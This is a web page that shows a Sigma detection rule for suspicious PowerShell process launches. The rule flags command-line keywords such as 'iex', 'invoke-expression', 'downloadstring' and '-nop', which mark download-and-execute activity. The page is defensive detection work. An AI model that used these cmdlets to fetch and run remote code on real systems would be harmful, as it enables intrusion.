Suspicious Powershell Cmdlets
Looks for look for cmdlets, methods, and switches that may indicate malicious activity. Inspired by the 2022 Red Canary Threat Detection report.
Sigma rule (View on GitHub)
1title: Suspicious Powershell Cmdlets
2id: b3dfac86-1056-4b6b-9c67-db4a10a9e812
3status: experimental
4description: Looks for look for cmdlets, methods, and switches that may indicate malicious
5 activity. Inspired by the 2022 Red Canary Threat Detection report.
6references:
7 - https://redcanary.com/threat-detection-report/techniques/powershell/
8author: Micah Babinski
9date: 2022/11/03
10tags:
11 - attack.execution
12 - attack.t1059
13 - attack.t1059.001
14logsource:
15 category: process_creation
16 product: windows
17detection:
18 selection:
19 Image|endswith: '\powershell.exe'
20 CommandLine|contains|windash:
21 - '-nop'
22 - '-noni'
23 - 'invoke-expression'
24 - 'iex'
25 - 'downloadstring'
26 - 'downloadfile'
27 - 'downloadata'
28 condition: selection
29falsepositives:
30 - Unknown
31level: high```
References
-
PowerShell reclaimed its place as the most prevalent technique we detected in 2023, as adversaries continue to abuse the framework.
Read More
Related rules
- Suspicious WMI-Related Powershell Cmdlets
- Base64 Encoding in CMD or Powershell
- PowerShell Base64 Encoding
- Wscript.exe Executing Agreement Javascript in AppData Folder
- Command Shell Bypassing Security Controls